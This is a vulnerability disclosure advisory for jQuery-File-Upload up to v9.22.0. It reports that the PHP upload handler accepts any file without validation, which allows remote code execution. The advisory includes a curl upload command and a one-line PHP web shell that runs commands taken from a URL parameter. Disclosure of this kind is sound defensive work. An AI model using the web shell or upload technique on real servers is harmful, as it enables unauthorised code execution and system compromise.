Title: jQuery-File-Upload <= v9.22.0 unauthenticated arbitrary file upload vulnerability
Author: Larry W. Cashdollar, @_larry0
Download Site: https://github.com/blueimp/jQuery-File-Upload/releases
Vendor Notified: 2018-10-09
Description: File Upload widget with multiple file selection, drag&drop support, progress bar, validation and preview images, audio and video for jQuery. Supports cross-domain, chunked and resumable file uploads. Works with any server-side platform (Google App Engine, PHP, Python, Ruby on Rails, Java, etc.) that supports standard HTML form file uploads.
The code in https://github.com/blueimp/jQuery-File-Upload/blob/master/server/php/UploadHandler.php doesn't require any validation to upload files
to the server. It also doesn't exclude file types. This allows for remote code execution.
This has been actively exploited in the wild for over a year.
$ curl -F "firstname.lastname@example.org" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php
Where shell.php is:
<?php $cmd=$_GET['cmd']; system($cmd);?>